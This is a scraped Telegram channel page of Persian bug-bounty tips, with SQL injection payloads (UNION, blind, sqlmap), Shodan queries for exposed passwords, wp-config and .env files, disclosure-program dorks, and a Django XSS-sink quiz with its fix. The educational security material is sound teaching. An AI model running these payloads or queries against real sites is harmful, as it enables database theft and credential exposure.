NEW BOT Телеграм, страница

Security hint

💡 کجا شروع کنیم؟

اگر تازه‌کارید، از سایت‌هایی که فقط برنامه‌های اطلاع‌رسانی آسیب‌پذیری (VDP) دارند، شروع کنید—برنامه‌هایی که به‌جای پاداش نقدی، فقط از شما قدردانی می‌کنند. چون هکرهای حرفه‌ای معمولاً وقتشان را روی این سایت‌ها نمی‌گذارند، فرصت خوبی برای شماست.

📌 برای پیدا کردن این سایت‌ها از Google Dorks استفاده کنید:

inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
responsible disclosure hall of fame
responsible disclosure europe
responsible disclosure white hat
white hat program
insite:"responsible disclosure" -inurl:nl
intext responsible disclosure
site eu responsible disclosure
site .nl responsible disclosure
site responsible disclosure
responsible disclosure:sites
responsible disclosure r=h:nl
responsible disclosure r=h:uk
responsible disclosure r=h:eu
responsible disclosure bounty r=h:nl
responsible disclosure bounty r=h:uk
responsible disclosure bounty r=h:eu
responsible disclosure swag r=h:nl
responsible disclosure swag r=h:uk
responsible disclosure swag r=h:eu
responsible disclosure reward r=h:nl
responsible disclosure reward r=h:uk
responsible disclosure reward r=h:eu
"powered by bugcrowd" -site:bugcrowd.com
"powered by hackerone" "submit vulnerability report"
"submit vulnerability report"
site:responsibledisclosure.com
inurl:'vulnerability-disclosure-policy' reward
intext:Vulnerability Disclosure site:nl
intext:Vulnerability Disclosure site:eu
site:*.*.nl intext:security report reward
site:*.*.nl intext:responsible disclosure reward
"security vulnerability" "report"
inurl"security report"
"responsible disclosure" university
inurl:/responsible-disclosure/ university
buy bitcoins "bug bounty"
inurl:/security ext:txt "contact"
"powered by synack"
intext:responsible disclosure bounty
inurl: private bugbountyprogram
inurl:/.well-known/security ext:txt
inurl:/.well-known/security ext:txt intext:hackerone
inurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbounty
inurl:reporting-security-issues
inurl:security-policy.txt ext:txt
site:*.*.* inurl:bug inurl:bounty
site:help.*.* inurl:bounty
site:support.*.* intext:security report reward
intext:security report monetary inurl:security 
intext:security report reward inurl:report
site:security.*.* inurl: bounty
site:*.*.de inurl:bug inurl:bounty
site:*.*.uk intext:security report reward
site:*.*.cn intext:security report reward
"vulnerability reporting policy"
"van de melding met een minimum van een" -site:responsibledisclosure.nl
inurl : /bitcon bug bounty
inurl : btc security rewards

اکنون که هدف خود را انتخاب کرده‌اید، مطمئن شوید که وب‌سایتی را انتخاب کرده‌اید که 5 تا 6 صفحه در عمق نتایج جستجوی Google ظاهر می‌شود،شاید شانس بیشتری برای کشف باگ داشته باشید.

#Dorks

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

❤24👍5

4.96K viewsedited 15:25

Security hint

بعد یه مدت یه پست گذاشتم اونم طولانی والبته پر اهمیت کانال تو شکه ویا شاید شما ⁉️⁉️⁉️
😂😂

👌8❤4👻3👍2🤣2

4.13K views15:53

Security hint

🎯 چرا ' در Sql Injection نتیجه نمی‌دهد؟

✅ ممکن است دلایل زیر مانع از نمایش نتیجه شوند:

خطاها در سمت سرور نمایش داده نمی‌شوند (Error Handling فعال است).
ورودی فیلتر شده و از بروز خطای SQL جلوگیری می‌شود.
تزریق در پارامتر اشتباه انجام شده است.

1- تست Blind SQL Injection:

🔹 اگر خروجی مشخصی نمی‌بینید، ممکن است با Blind SQL Injection مواجه باشید. از این روش‌ها استفاده کنید:
الف. Boolean-Based Injection:

?id=1 AND 1=1 -- (خروجی باید بدون تغییر باشد)
?id=1 AND 1=2 -- (خروجی باید تغییر کند یا صفحه خطا دهد)

ب. Time-Based Injection:

?id=1 AND SLEEP(5) -- (صفحه باید با تأخیر بارگذاری شود)

2- شناسایی ستون‌ها با UNION
✅ تعداد ستون‌ها را با ORDER BY شناسایی کنید:

?id=1 ORDER BY 1--
?id=1 ORDER BY 2--

وقتی به خطا رسیدید، تعداد ستون‌ها یک عدد کمتر از مقدار تست‌شده است.

✅ بعد از شناسایی تعداد ستون‌ها، از UNION SELECT استفاده کنید:

?id=1 UNION SELECT 1,2,3,4--

3- پیدا کردن ستون‌های قابل مشاهده

🔹 برای پیدا کردن ستون‌هایی که خروجی آن‌ها در صفحه نمایش داده می‌شود:

?id=1 UNION SELECT 1,'test',3,4--

🔑 وقتی مقدار 'test' نمایش داده شد، ستون قابل مشاهده است.
4- استخراج اطلاعات حساس

✅ نسخه پایگاه داده:

?id=1 UNION SELECT 1,@@version,3,4--

?id=1 UNION SELECT 1,version(),3,4--

✅ نام جداول موجود:

?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

استفاده از ابزارهای خودکار

💻 ابزار Sqlmap به شما کمک می‌کند که به‌صورت خودکار تزریق SQL را شناسایی و اطلاعات را استخراج کنید:

sqlmap -u "http://example.com/page.php?id=1" --dbs

#پنتست #SQLi #امنیت_سایبری #باگ_بانتی

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

👍14❤4👎1

6.14K views17:04

Security hint

🔍 Bug Bounty Tips for Smart Hunters 🐞

#bugbounty #trip

🌐Sec_Hint

👌12👍2

5.34K views15:27

Security hint

Bug Bounty Beginner's.pdf

187.9 KB

🚄راهنمای خوبی هست اگر هنوز سر اینکه از چی بخونم، از کجا بخونم مشکل دارید....🤔🤔

#BugBounty #book

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

👍12❤5

5.47K views05:38

Security hint

🤑Shodan Secrets | Hack Hidden Files Easily

🛑Default Directory Listing

http.html:"index of /"

🛑Backup Files

http.html:"index of /" http.html:"backup"

🛑Compressed Achives

http.html:"index of /" http.html:"tar.gz"

🛑Database Files

http.html:"index of /" http.html:"database"
http.html:"index of /" http.html:".sql"
http.html:"index of /" http.html:".db"
http.html:"index of /" http.html:"db_backup"
http.html:"index of /" http.html:"mysql.dump"
http.html:"index of /" http.html:".mdb"

🛑Configuration Files

http.html:"index of /" http.html:"config.xml"

🛑Wordpress Configuration Files

http.html:"index of /" http.html:"wp-config.php.txt"
http.html:"index of /" http.html:"wp-config.txt"
http.html:"index of /" http.html:"wp-config.php.bak"
http.html:"index of /" http.html:"wp-config.php.old"
http.html:"index of /" http.html:"wp-config.php.backup"
http.html:"index of /" http.html:"wp-config.php.zip"
http.html:"index of /" http.html:"wp-config.php.tar.gz"

🛑Passwords

http.html:"index of /" http.html:"pwd"
http.html:"index of /" http.html:"pass.txt"
http.html:"index of /" http.html:"password"
http.html:"index of /" http.html:"password.txt"
http.html:"index of /" http.html:"passwords.txt"
http.html:"index of /" http.html:"passwords.zip"

🛑Windows Server Config Files

http.html:"index of /" http.html:"web.config"

🛑Exposed Logs

http.html:"index of /" http.html:".log"
http.html:"index of /" http.html:"access.log"
http.html:"index of /" http.html:"error.log"
http.html:"index of /" http.html:"php_error.log"
http.html:"index of /" http.html:"debug.log"

🛑Configuration and Version Control Files

http.html:"index of /" http.html:".env"
http.html:"index of /" http.html:".svn"

🛑Git Repositories

http.html:"index of /" http.html:".git"
http.html:"index of /" http.html:"gitconfig"

📃 source

#shodan #Dorks

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

👍19❤3🤣2

6.99K views12:54

Security hint

همه چی در یک خط 🤔

➖یک ریپازیتوری فوق‌العاده که مجموعه‌ای از One-Liners آماده رو ارائه می‌ده! با این دستورات کوتاه، می‌تونید subdomain‌ها رو جمع‌آوری کنید، آسیب‌پذیری‌ها رو شناسایی کنید، و کارهای دیگه‌ای که توی باگ‌بانتی نیاز دارید رو سریع انجام بدید. اگر دنبال ابزارهای سریع و کاربردی هستید، این دقیقاً همونه که لازم دارید.

🔗 لینک

#Github #BugBounty

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

👍13❤4

8.23K views15:38

Security hint

api-security-in-action.pdf

8.1 MB

Hacking APIs - Early Access.pdf

12.5 MB

📕معرفی دوتا کتاب عالی برای یادگیری Hacking API

فقط اگر سطح زبان خوبی ندارید و نمیخاید خیلی وارد جزییات بشید و سر راست برید سر اصل مطلب پیشنهادم خوندن کتاب hacking API هست...

من بیشتر باهاش ارتباط برقرار کردم تا کتاب API Security in Action 🤷🏼‍♀️

شما کدوم رو خوندی و پیشنهاد میدید؟!

#API #hacking

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

❤18👍2

11.9K viewsedited 20:15

Security hint

Gareth_Heyes_JavaScript_for_hackers_Learn_to_think_like_a_hacker.pdf

1.8 MB

اگر جاوااسکریپت رو در حد قابل قبولی بلدید میتونید از این فایل استفاده کنید و موارد مورد نیاز امنیت در جاوااسکریپت رو یاد بگیرید...

اگر چیزی از جاوااسکریپت نمیدونید بهتره با این فایل شروع نکنید.

#javanoscript

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

❤27👍10👌2😁1

13K views18:45

Security hint

برای روزایی ک شاید اینترنت نداشته باشید، عضو کانالش بشید و از منابع فارسیش استفاده کنید
کتاب های مهم رو ترجمه میکنه ...
@web_articles

👍10

6.11K viewsedited 18:31

Security hint

Forwarded from 🕸 Articles

HTTP Host Header Attacks.pdf

2.9 MB

Author: zarvan
Language: Persian
Telegram channel: @web_articles

❤18👍2

6.06K views19:23

Security hint

🕵️‍♂️ کد آسیب‌پذیر !

یه فرم ساده داریم که با fetch داده‌ها رو به سرور می‌فرسته 👇
(همون چیزی که خیلیا برای تماس یا ثبت‌نام استفاده می‌کنن)

<form id="contactForm">
  {% csrf_token %}
  {{ form.as_p }}
  <button type="submit">ارسال</button>
</form>

<div id="result"></div>

<noscript>
document.getElementById("contactForm").addEventListener("submit", function(e) {
  e.preventDefault();
  fetch("{% url 'contact' %}", {
    method: "POST",
    body: new FormData(this),
    headers: {
      "X-Requested-With": "XMLHttpRequest"
    }
  })
  .then(res => res.json())
  .then(data => {
    document.getElementById("result").innerHTML = data.message;
  });
});
</noscript>

ر ظاهر همه چیز خوبه، نه؟ 😎
اما این کد یه آسیب‌پذیری امنیتی داره که می‌تونه راه نفوذ رو برای حملات باز کنه 😬

💬 به نظرتون مشکل کجاست و چطور می‌شه برطرفش کرد؟
(جوابتونو توی کامنت‌ها بنویسین 👇)

#Django #Python #security

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

🔥7❤3👍1

3.22K viewsedited 11:40

Security hint

یه مدت خبری ازم نبود… ولی برگشتم 😎

توی این مدت درگیر کار و چندتا پروژه بودم، و مجبور شدم از دنیای مورد علاقه‌م — ساختن و کشف کردن — کمی فاصله بگیرم.

حالا قراره دوباره از قدم‌های کوچیک شروع کنیم، آروم‌آروم رشد کنیم و یکی‌یکی پله‌ها رو بالا بریم تا باهم چالش‌های دنیای وب رو پشت سر بذاریم. 🚀

خب یه سؤال!
شما بک‌اند سایت‌ رو با چی شناختید یا شروع کردید؟
PHP 🔥
Flask, Django ❤️
.NET👻
یا فریم‌ورک‌های جاوااسکریپتی⚡️؟

با ریکشن نشون بدید ببینم کدوم یکی مخاطب بیشتری داره؟ میتونید نظرتون رو هم کامنت کنید😎

🔥37❤24⚡6🦄5👍2

2.61K views18:51

Security hint

🕵️‍♂️ کد آسیب‌پذیر ! یه فرم ساده داریم که با fetch داده‌ها رو به سرور می‌فرسته 👇 (همون چیزی که خیلیا برای تماس یا ثبت‌نام استفاده می‌کنن) <form id="contactForm"> {% csrf_token %} {{ form.as_p }} <button type="submit">ارسال</button> </form> <div id…

🕵️‍♂️🔥خوب بریم سراغ جواب:

ممنون ازدوستانی که کامنت گذاشتن و جواب دادن❤️

یه فرم ساده داریم که با fetch داده‌ها رو می‌فرسته — ظاهراً همه‌چیز مرتبِ، نه؟ 😎

ولی اولین نکته وجود sink خطرناک که اگر پیلودی ارسال بشه، در سرور هم درست بررسی و فیلتر نشه باعث حملات XSS میشه😱

document.getElementById("result").innerHTML = data.message;

چطوری توی همینجا امنش کنیم ؟!👇
1️⃣ بجای innerHTML از textContent استفاده کنیم ...✅
2️⃣ یا در سمت سرور داده‌ها رو فیلتر و Escape کنیم🔒
————————————————————————-
🧩 بعضی دوستان به ارسال CSRF_Token اشاره داشتن،
اما اینجا یک نکته مهم وجود داره 👇

اگر از درخواست‌های API / JSON بدون فرم استفاده می‌کنی،
باید توکن CSRF رو دستی از کوکی بگیری و در هدر بفرستی.

ولی در اینجا خود فرم شامل {% csrf_token %} هست و FormData(this) مقدار csrfmiddlewaretoken رو در خودش داره ✅
پس نیازی به گرفتن مجدد CSRF نیست.
فقط کافیه از گزینه‌ی credentials: "same-origin" استفاده کنی تا کوکی‌ها هم ارسال بشن

🧱 کد ایمن نهایی:

<form id="contactForm">
  {% csrf_token %}
  {{ form.as_p }}
  <button type="submit">ارسال</button>
</form>

<div id="result"></div>

<noscript>
document.getElementById("contactForm").addEventListener("submit", function(e) {
  e.preventDefault();
  fetch("{% url 'contact' %}", {
    method: "POST",
    credentials: 'same-origin',
    body: new FormData(this),
    headers: {
      "X-Requested-With": "XMLHttpRequest"
    }
  })
  .then(res => res.json())
  .then(data => {
    document.getElementById("result").textContent  = data.message;
  });
});
</noscript>

#Django #Python #security

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

❤5🔥2🏆1

3.41K views19:22

Security hint

2:48

به درخواست یکی از دوستان

ویدیو XSS در YouTube برای اشنایی بیشتر با XSS, JavaScript

https://youtu.be/s0GKrnTBxp0

#xss

🙏6👍3❤2

4.08K views20:52

Security hint

بیام با جنگو یک اپ کوچیک رو اموزش بدم ؟!🤔
بعدش میتونیم API هم روش تست کنیم🧐

👍29❤15👎2

4.29K views06:28

Security hint

Forwarded from 🕸 Articles

Web Application Security-Persian.pdf

9.7 MB

Author: zarvan
Language: Persian
Telegram channel: @web_articles

🙏14

2.17K views03:19

Security hint

🕸 Articles

Web Application Security-Persian.pdf

اگه هیچکاری نمیتونید بکنید
حداقل بشنید این کتاب و بخونید نکته بردارید ک بعدا استفاده کنید

ترجمه یکی از بهترین کتاب های web security هست ک پیشنهاد میشه بخونید

❤18🙏1

2.51K views03:21

Security hint

قبل از ماجرای قطعی اینترنت قرار بود یه چالش بزارم تا عید ...
با اینکه پستش رو هم اماده کرده بودم دیگه نشد...

خوب از الان شروع کنید و ببینیم تا عید چقدر میتونیم چالش هاش رو حل کنیم و سطحمون رو افزایش بدیم

دوست داشتین پروفایل root-me تون رو به اشتراک بزارید تا متعهد به چالش کشیدن خودتون بشید😉

از روزی که این اسکرین رو گرفتم تا الان 14فک میکنم حل کردم

www.root-me.org

@Sec_Hint

👎3👏2🙏2💯2

1.22K views19:44

About

Blog

Apps

Platform